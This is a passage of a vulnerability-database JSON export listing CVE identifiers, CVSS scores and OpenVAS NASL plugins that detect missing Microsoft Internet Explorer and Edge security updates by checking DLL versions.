"COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0193", "CVE-2017-0260", "CVE-2017-0282", "CVE-2017-0283", "CVE-2017-0284", "CVE-2017-0285", "CVE-2017-0286", "CVE-2017-0287", "CVE-2017-0288", "CVE-2017-0289", "CVE-2017-0294", "CVE-2017-0296", "CVE-2017-0297", "CVE-2017-0298", 
"CVE-2017-0299", "CVE-2017-0300", "CVE-2017-8462", "CVE-2017-8464", "CVE-2017-8469", "CVE-2017-8470", "CVE-2017-8471", "CVE-2017-8472", "CVE-2017-8473", "CVE-2017-8475", "CVE-2017-8476", "CVE-2017-8477", "CVE-2017-8478", "CVE-2017-8479", "CVE-2017-8480", "CVE-2017-8481", "CVE-2017-8482", "CVE-2017-8483", "CVE-2017-8484", "CVE-2017-8485", "CVE-2017-8488", "CVE-2017-8489", "CVE-2017-8490", "CVE-2017-8491", "CVE-2017-8492", "CVE-2017-8517", "CVE-2017-8519", "CVE-2017-8527", "CVE-2017-8528", "CVE-2017-8529", "CVE-2017-8531", "CVE-2017-8532", "CVE-2017-8533", "CVE-2017-8534", "CVE-2017-8543", "CVE-2017-8544", "CVE-2017-8553"], "modified": "2022-01-18T00:00:00", "id": "KLA11842", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11842/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2020-06-08T23:20:43", "description": "This host is missing a critical security\n update according to Microsoft security updates KB4021558.", "cvss3": {}, "published": "2017-06-14T00:00:00", "type": "openvas", "title": "Microsoft Internet Explorer Multiple Vulnerabilities (KB4021558)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-8522", "CVE-2016-3326", "CVE-2017-8517", "CVE-2017-8524", "CVE-2017-8519", "CVE-2017-8547", "CVE-2017-8529"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310810943", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810943", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Internet Explorer Multiple Vulnerabilities (KB4021558)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software 
Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:microsoft:ie\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810943\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-8517\", \"CVE-2017-8519\", \"CVE-2017-8522\", \"CVE-2017-8524\",\n \"CVE-2017-8529\", \"CVE-2017-8547\", \"CVE-2016-3326\");\n script_bugtraq_id(98895, 98899, 98926, 98930, 98953, 98932, 92287);\n script_tag(name:\"cvss_base\", value:\"7.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-06-14 12:38:50 +0530 (Wed, 14 Jun 2017)\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_name(\"Microsoft Internet Explorer Multiple Vulnerabilities (KB4021558)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft security updates KB4021558.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - Multiple errors in the way JavaScript scripting engines handle objects in\n memory in Microsoft browsers.\n\n - Multiple errors when microsoft scripting engines do not properly handle\n objects in memory.\n\n - Multiple errors when Microsoft browsers improperly handle 
objects in memory.\n\n - An error when Internet Explorer improperly accesses objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker\n to obtain information to further compromise the users system, execute\n arbitrary code in the context of the current user and detect specific files\n on the user's computer.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Internet Explorer version 9.x, 10.x and 11.x.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4021558\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"gb_ms_ie_detect.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"MS/IE/Version\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2008:3, win2008x64:3, win7:2, win7x64:2, win2008r2:2,\n win2012:1, win2012R2:1, win8_1:1, win8_1x64:1) <= 0){\n exit(0);\n}\n\nieVer = get_app_version(cpe:CPE);\nif(!ieVer || ieVer !~ \"^(9|1[01])\\.\"){\n exit(0);\n}\n\niePath = smb_get_system32root();\nif(!iePath ){\n exit(0);\n}\n\niedllVer = fetch_file_version(sysPath:iePath, file_name:\"Mshtml.dll\");\nsllVer = fetch_file_version(sysPath:iePath, file_name:\"Sqmapi.dll\");\n\nif(!iedllVer && !sllVer){\n exit(0);\n}\n\n##Server 2008\nif(hotfix_check_sp(win2008:3, win2008x64:3) > 0 && iedllVer)\n{\n if(version_in_range(version:iedllVer, test_version:\"9.0.8112.16000\", test_version2:\"9.0.8112.16905\"))\n {\n Vulnerable_range = \"9.0.8112.16000 - 9.0.8112.16905\";\n VULN = TRUE ;\n }\n else 
if(version_in_range(version:iedllVer, test_version:\"9.0.8112.20000\", test_version2:\"9.0.8112.21016\"))\n {\n Vulnerable_range = \"9.0.8112.20000 - 9.0.8112.21016\";\n VULN = TRUE ;\n }\n}\n\n# Win 2012\nelse if(hotfix_check_sp(win2012:1) > 0 && sllVer)\n{\n if(version_is_less(version:sllVer, test_version:\"6.2.9200.16384\"))\n {\n report = 'File checked: ' + iePath + \"\\Sqmapi.dll\" + '\\n' +\n 'File version: ' + sllVer + '\\n' +\n 'Vulnerable range: Less than 6.2.9200.16384\\n' ;\n security_message(data:report);\n exit(0);\n }\n}\n\nelse if(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012R2:1, win7:2, win7x64:2, win2008r2:2) > 0 && iedllVer)\n{\n if(version_in_range(version:iedllVer, test_version:\"11.0\", test_version2:\"11.0.9600.18697\"))\n {\n Vulnerable_range = \"11.0 - 11.0.9600.18697\";\n VULN = TRUE ;\n }\n}\n\nif(VULN)\n{\n report = 'File checked: ' + iePath + \"\\Mshtml.dll\" + '\\n' +\n 'File version: ' + iedllVer + '\\n' +\n 'Vulnerable range: ' + Vulnerable_range + '\\n' ;\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:29:08", "description": "This host is missing a critical security\n update according to Microsoft security updates KB4036586.", "cvss3": {}, "published": "2017-09-13T00:00:00", "type": "openvas", "title": "Microsoft Internet Explorer Multiple Vulnerabilities (KB4036586)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-8741", "CVE-2017-8749", "CVE-2017-8750", "CVE-2017-8747", "CVE-2017-8748", "CVE-2017-8736", "CVE-2017-8529", "CVE-2017-8733"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310811760", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811760", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Internet Explorer Multiple Vulnerabilities (KB4036586)\n#\n# Authors:\n# Shakeel 
<bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:microsoft:ie\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811760\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-8529\", \"CVE-2017-8733\", \"CVE-2017-8736\", \"CVE-2017-8741\",\n \"CVE-2017-8747\", \"CVE-2017-8748\", \"CVE-2017-8749\", \"CVE-2017-8750\");\n script_bugtraq_id(100737, 98953, 100764, 100743, 100766, 100770, 100771, 100765);\n script_tag(name:\"cvss_base\", value:\"7.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-09-13 16:28:36 +0530 (Wed, 13 Sep 2017)\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_name(\"Microsoft Internet Explorer Multiple Vulnerabilities (KB4036586)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft security updates KB4036586.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n 
script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - Microsoft scripting engines do not properly handle objects in memory.\n\n - Internet Explorer improperly handles specific HTML content.\n\n - An error in Microsoft browsers due to improper parent domain verification\n in certain functionality.\n\n - An error in the way that Microsoft browser JavaScript engines render content\n when handling objects in memory.\n\n - Internet Explorer improperly accesses objects in memory.\n\n - An error in the way that Microsoft browser JavaScript engines render content\n when handling objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker\n to execute arbitrary code in the context of the current user, gain access to\n potentially sensitive information, spoof content or serve as a pivot and detect\n specific files on the user's computer.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Internet Explorer version 9.x, 10.x and 11.x.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4036586\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"gb_ms_ie_detect.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"MS/IE/Version\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2008:3, win2008x64:3, win7:2, win7x64:2, win2008r2:2,\n win2012:1, win2012R2:1, win8_1:1, win8_1x64:1) <= 0){\n exit(0);\n}\n\nieVer = get_app_version(cpe:CPE);\nif(!ieVer || ieVer !~ \"^(9|1[01])\\.\"){\n exit(0);\n}\n\niePath = smb_get_system32root();\nif(!iePath ){\n exit(0);\n}\n\niedllVer = fetch_file_version(sysPath:iePath, file_name:\"Mshtml.dll\");\nif(!iedllVer){\n exit(0);\n}\n\n##Server 2008\nif(hotfix_check_sp(win2008:3, win2008x64:3) > 0)\n{\n if(version_is_less(version:iedllVer, test_version:\"9.0.8112.21046\"))\n {\n Vulnerable_range = \"Less than 9.0.8112.21046\";\n VULN = TRUE ;\n }\n}\n\n# Win 2012\nelse if(hotfix_check_sp(win2012:1) > 0)\n{\n if(version_is_less(version:iedllVer, test_version:\"10.0.9200.22248\"))\n {\n Vulnerable_range = \"Less than 10.0.9200.22248\";\n VULN = TRUE ;\n }\n}\n\nelse if(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012R2:1, win7:2, win7x64:2, win2008r2:2) > 0)\n{\n if(version_is_less(version:iedllVer, test_version:\"11.0.9600.18792\"))\n {\n Vulnerable_range = \"Less than 11.0.9600.18792\";\n VULN = TRUE ;\n }\n}\n\nif(VULN)\n{\n report = 'File checked: ' + iePath + \"\\Mshtml.dll\" + '\\n' +\n 'File version: ' + iedllVer + '\\n' +\n 'Vulnerable range: ' + Vulnerable_range + '\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", 
"cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-08T13:45:28", "description": "This host is missing a critical security\n update according to Microsoft KB4022725", "cvss3": {}, "published": "2017-06-14T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4022725)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-8531", "CVE-2017-8481", "CVE-2017-8491", "CVE-2017-8478", "CVE-2017-8533", "CVE-2017-8462", "CVE-2017-8485", "CVE-2017-8499", "CVE-2017-8530", "CVE-2017-8482", "CVE-2017-8549", "CVE-2017-0288", "CVE-2017-8464", "CVE-2017-8483", "CVE-2017-0297", "CVE-2017-8522", "CVE-2017-8492", "CVE-2017-8543", "CVE-2017-0291", "CVE-2017-8465", "CVE-2017-8490", "CVE-2017-8471", "CVE-2017-8474", "CVE-2017-8480", "CVE-2017-0283", "CVE-2017-8460", "CVE-2017-0294", "CVE-2017-0292", "CVE-2017-8489", "CVE-2017-8517", "CVE-2017-8477", "CVE-2017-8479", "CVE-2017-8532", "CVE-2017-8523", "CVE-2017-8524", "CVE-2017-8575", "CVE-2017-0300", "CVE-2017-8520", "CVE-2017-8521", "CVE-2017-8548", "CVE-2017-8498", "CVE-2017-0287", "CVE-2017-0285", "CVE-2017-8470", "CVE-2017-8547", "CVE-2017-0295", "CVE-2017-8518", "CVE-2017-8555", "CVE-2017-8544", "CVE-2017-0298", "CVE-2017-0299", "CVE-2017-8515", "CVE-2017-0282", "CVE-2017-8475", "CVE-2017-8476", "CVE-2017-8529", "CVE-2017-0289", "CVE-2017-8504", "CVE-2017-8484", "CVE-2017-8554", "CVE-2017-8493", "CVE-2017-8527", "CVE-2017-0296"], "modified": "2019-12-20T00:00:00", "id": "OPENVAS:1361412562310811167", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811167", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4022725)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it 
and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811167\");\n script_version(\"2019-12-20T12:42:55+0000\");\n script_cve_id(\"CVE-2017-8474\", \"CVE-2017-8524\", \"CVE-2017-8527\", \"CVE-2017-8475\",\n \"CVE-2017-8476\", \"CVE-2017-8529\", \"CVE-2017-8530\", \"CVE-2017-0282\",\n \"CVE-2017-0283\", \"CVE-2017-8477\", \"CVE-2017-8478\", \"CVE-2017-8531\",\n \"CVE-2017-8532\", \"CVE-2017-0285\", \"CVE-2017-8479\", \"CVE-2017-8480\",\n \"CVE-2017-8533\", \"CVE-2017-8543\", \"CVE-2017-0287\", \"CVE-2017-0288\",\n \"CVE-2017-8481\", \"CVE-2017-8482\", \"CVE-2017-8544\", \"CVE-2017-8547\",\n \"CVE-2017-8548\", \"CVE-2017-8549\", \"CVE-2017-0289\", \"CVE-2017-0291\",\n \"CVE-2017-8483\", \"CVE-2017-8484\", \"CVE-2017-8555\", \"CVE-2017-0292\",\n \"CVE-2017-0294\", \"CVE-2017-0295\", \"CVE-2017-8485\", \"CVE-2017-8489\",\n \"CVE-2017-0296\", \"CVE-2017-0297\", \"CVE-2017-0298\", \"CVE-2017-8490\",\n \"CVE-2017-8491\", \"CVE-2017-0299\", \"CVE-2017-0300\", \"CVE-2017-8492\",\n \"CVE-2017-8493\", \"CVE-2017-8498\", \"CVE-2017-8499\", \"CVE-2017-8504\",\n \"CVE-2017-8460\", \"CVE-2017-8462\", \"CVE-2017-8470\", \"CVE-2017-8471\",\n \"CVE-2017-8520\", \"CVE-2017-8521\", \"CVE-2017-8522\", \"CVE-2017-8523\",\n \"CVE-2017-8464\", \"CVE-2017-8465\", \"CVE-2017-8515\", \"CVE-2017-8517\",\n 
\"CVE-2017-8554\", \"CVE-2017-8575\", \"CVE-2017-8518\");\n script_bugtraq_id(98902, 98930, 98933, 98853, 98903, 98953, 98863, 98885, 98920,\n 98854, 98845, 98819, 98820, 98914, 98856, 98857, 98821, 98824,\n 98922, 98923, 98862, 98858, 98826, 98932, 98954, 98955, 98929,\n 98835, 98859, 98847, 98956, 98836, 98837, 98904, 98860, 98865,\n 98839, 98840, 98867, 98869, 98884, 98901, 98870, 98850, 98886,\n 98883, 98892, 98887, 98900, 98848, 98849, 98925, 98926, 98928,\n 98818, 98843, 98833, 98895);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-12-20 12:42:55 +0000 (Fri, 20 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-06-14 13:30:05 +0530 (Wed, 14 Jun 2017)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4022725)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4022725\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The multiple flaws are due to,\n\n - The error with slow firewall operations that sometimes results in\n timeouts of Surface Hub's cleanup operation.\n\n - An issue with a race condition that prevents Cortana cross-device\n notification reply from working. 
Users will not be able to use the\n remote toast activation feature set.\n\n - An issue with the Privacy Separator feature of a Wireless Access Point\n does not block communication between wireless devices on local subnets.\n\n - Microsoft Edge improperly accesses objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow\n attackers to execute arbitrary code in the context of the current user,\n gain the same user rights as the current user and to take control of\n an affected system.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 Version 1703 x32/x64\n\n - Microsoft Windows Server 2016\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4022725\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1, win2016:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"Edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.15063.0\", test_version2:\"11.0.15063.412\"))\n{\n report = 'File checked: ' + sysPath + \"\\Edgehtml.dll\" + '\\n' +\n 'File version: ' + edgeVer + '\\n' +\n 'Vulnerable range: 11.0.15063.0 - 11.0.15063.412\\n' ;\n security_message(data:report);\n 
exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:26:43", "description": "This host is missing a critical security\n update according to Microsoft KB4022714", "cvss3": {}, "published": "2017-06-14T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4022714)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-8531", "CVE-2017-8481", "CVE-2017-0218", "CVE-2017-8491", "CVE-2017-8478", "CVE-2017-8533", "CVE-2017-8462", "CVE-2017-8485", "CVE-2017-8530", "CVE-2017-8482", "CVE-2017-8549", "CVE-2017-0288", "CVE-2017-8464", "CVE-2017-8483", "CVE-2017-0297", "CVE-2017-8522", "CVE-2017-8492", "CVE-2017-8543", "CVE-2017-0291", "CVE-2017-8465", "CVE-2017-8490", "CVE-2017-8471", "CVE-2017-8474", "CVE-2017-8480", "CVE-2017-0283", "CVE-2017-8460", "CVE-2017-0294", "CVE-2017-0292", "CVE-2017-8468", "CVE-2017-8489", "CVE-2017-8517", "CVE-2017-8477", "CVE-2017-8479", "CVE-2017-8532", "CVE-2017-8523", "CVE-2017-8524", "CVE-2017-0193", "CVE-2017-8575", "CVE-2017-0300", "CVE-2017-8494", "CVE-2017-8548", "CVE-2017-0287", "CVE-2017-8473", "CVE-2017-0285", "CVE-2017-8470", "CVE-2017-8547", "CVE-2017-0216", "CVE-2017-0284", "CVE-2017-8518", "CVE-2017-8544", "CVE-2017-0298", "CVE-2017-0299", "CVE-2017-0219", "CVE-2017-8515", "CVE-2017-0282", "CVE-2017-8475", "CVE-2017-8466", "CVE-2017-8476", "CVE-2017-8529", "CVE-2017-0289", "CVE-2017-8484", "CVE-2017-8554", "CVE-2017-8493", "CVE-2017-8527", "CVE-2017-0296"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310811164", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811164", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4022714)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, 
http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811164\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-0193\", \"CVE-2017-8473\", \"CVE-2017-8474\", \"CVE-2017-8527\",\n \"CVE-2017-0216\", \"CVE-2017-0218\", \"CVE-2017-0219\", \"CVE-2017-0282\",\n \"CVE-2017-8475\", \"CVE-2017-8476\", \"CVE-2017-8477\", \"CVE-2017-8529\",\n \"CVE-2017-8530\", \"CVE-2017-8531\", \"CVE-2017-0283\", \"CVE-2017-0284\",\n \"CVE-2017-8478\", \"CVE-2017-8479\", \"CVE-2017-8532\", \"CVE-2017-8533\",\n \"CVE-2017-0285\", \"CVE-2017-0287\", \"CVE-2017-8480\", \"CVE-2017-8481\",\n \"CVE-2017-8543\", \"CVE-2017-0288\", \"CVE-2017-0289\", \"CVE-2017-8482\",\n \"CVE-2017-8483\", \"CVE-2017-8544\", \"CVE-2017-8547\", \"CVE-2017-8548\",\n \"CVE-2017-8549\", \"CVE-2017-0291\", \"CVE-2017-0292\", \"CVE-2017-8484\",\n \"CVE-2017-8485\", \"CVE-2017-0294\", \"CVE-2017-0296\", \"CVE-2017-8489\",\n \"CVE-2017-8490\", \"CVE-2017-0297\", \"CVE-2017-0298\", \"CVE-2017-0299\",\n \"CVE-2017-8491\", \"CVE-2017-8492\", \"CVE-2017-0300\", \"CVE-2017-8460\",\n \"CVE-2017-8493\", \"CVE-2017-8494\", \"CVE-2017-8462\", \"CVE-2017-8464\",\n \"CVE-2017-8470\", \"CVE-2017-8471\", \"CVE-2017-8522\", 
\"CVE-2017-8523\",\n \"CVE-2017-8524\", \"CVE-2017-8465\", \"CVE-2017-8466\", \"CVE-2017-8468\",\n \"CVE-2017-8515\", \"CVE-2017-8517\", \"CVE-2017-8554\", \"CVE-2017-8575\",\n \"CVE-2017-8518\");\n script_bugtraq_id(98878, 98852, 98902, 98933, 98896, 98897, 98898, 98885, 98853,\n 98903, 98854, 98953, 98863, 98819, 98920, 98918, 98845, 98856,\n 98820, 98821, 98914, 98922, 98857, 98862, 98824, 98923, 98929,\n 98858, 98859, 98826, 98932, 98954, 98955, 98835, 98836, 98847,\n 98860, 98837, 98839, 98865, 98867, 98840, 98884, 98869, 98870,\n 98901, 98887, 98850, 98855, 98900, 98818, 98848, 98849, 98926,\n 98928, 98930, 98843, 98844, 98846, 98833, 98895);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-06-14 10:02:48 +0530 (Wed, 14 Jun 2017)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4022714)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4022714\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The multiple flaws exists in,\n\n - The metafiles (EMF) or documents containing bitmaps rendered out of bounds\n using the BitMapSection(DIBSection) function.\n\n - The certutil.exe can no longer generate an export file (.epf) when attempting\n to recover a key for a version 1 certificate.\n\n - Additional issues with updated time zone information, updates to the\n Access Point Name (APN) database and Internet Explorer. Security updates to\n Microsoft Scripting Engine, Microsoft Edge, Windows COM, Windows kernel, Windows\n kernel-mode drivers, Microsoft Uniscribe, Microsoft Graphics Component, Windows\n Shell, Microsoft Windows PDF and Internet Explorer. 
For more information about\n the security vulnerabilities resolved, please refer to the Security Update Guide.\n\n - Microsoft Edge improperly accesses objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers to\n execute arbitrary code in the context of the current user, gain the same user\n rights as the current user, to take control of an affected system.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows 10 Version 1511 x32/x64.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4022714\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"Edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.10586.0\", test_version2:\"11.0.10586.961\"))\n{\n report = 'File checked: ' + sysPath + \"\\Edgehtml.dll\" + '\\n' +\n 'File version: ' + edgeVer + '\\n' +\n 'Vulnerable range: 11.0.10586.0 - 11.0.10586.961\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:21:01", "description": "This host is missing a 
